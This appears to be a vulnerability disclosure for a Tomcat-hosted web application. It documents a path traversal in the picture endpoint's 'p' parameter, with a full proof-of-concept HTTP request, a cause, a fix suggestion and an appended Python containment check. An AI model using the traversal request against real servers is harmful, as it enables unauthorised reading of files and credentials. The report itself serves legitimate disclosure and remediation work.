[Vulnerability type]
arbitrary file read
[proof]

First we create a file flag.txt at D:\apache-tomcat-9.0.79\webapps\ROOT\flag.txt. The content of the file is "flag{this_is_flag}".
Then we send the HTTP request:
GET /system/user/picture?p=/../flag.txt HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/system/menu/edit/6
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099,1701995116; JSESSIONID=dd7cb592-38d0-415e-93e8-e79fb3b2de25
Connection: close
[Causes of Vulnerability]

If we pass the parameter p, it is used as part of the image path, so we can pass ../../...... to read arbitrary files on the system.
[Fix suggestion]
Add a filter to forbid ".."
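A substring filter for ".." is fragile; the check a maintainer usually wants is to canonicalise the joined path and verify it is still inside the picture directory. The following is an added Python illustration of that check (not code from the affected project, which would apply the same logic with java.nio.file.Path); the base directory name and the sample files are assumed.

```python
"""Canonicalise-then-contain check for a user-supplied picture path."""
from pathlib import Path


def resolve_picture(base_dir: str, p: str) -> Path:
    """Return the canonical path of picture `p` inside `base_dir`.

    Raises PermissionError if the canonical path is not strictly inside
    base_dir, which covers "..", absolute paths and symlinks pointing out.
    """
    if not p:
        raise ValueError("empty picture path")
    base = Path(base_dir).resolve()
    # Join the way a naive implementation would: an absolute `p` replaces
    # `base` entirely (the weakness in the report), then canonicalise so
    # ".." segments and symlinks are collapsed before the check.
    candidate = (base / p).resolve()
    # Strict containment: the directory itself is not a picture either.
    if candidate == base or base not in candidate.parents:
        raise PermissionError(f"picture path escapes {base}: {p!r}")
    return candidate


def is_safe_picture_path(base_dir: str, p: str) -> bool:
    """Boolean wrapper around resolve_picture, for tests and logging."""
    try:
        resolve_picture(base_dir, p)
        return True
    except (PermissionError, ValueError):
        return False


def _demo() -> None:
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "pictures"            # assumed picture directory
        base.mkdir()
        (base / "avatar.png").write_bytes(b"constructed sample")
        secret = Path(tmp) / "flag.txt"          # constructed file outside base
        secret.write_text("flag{constructed}")
        (base / "link.png").symlink_to(secret)   # symlink escaping the base dir
        for p in ["avatar.png", "/../flag.txt", "../flag.txt", "link.png"]:
            verdict = "allowed" if is_safe_picture_path(str(base), p) else "rejected"
            print(f"{p!r:16} -> {verdict}")


if __name__ == "__main__":
    _demo()
```

The request in the report (p=/../flag.txt) is rejected because the canonical candidate resolves outside the base directory, while a path such as avatars/../2.png that contains ".." but stays inside the directory is still allowed.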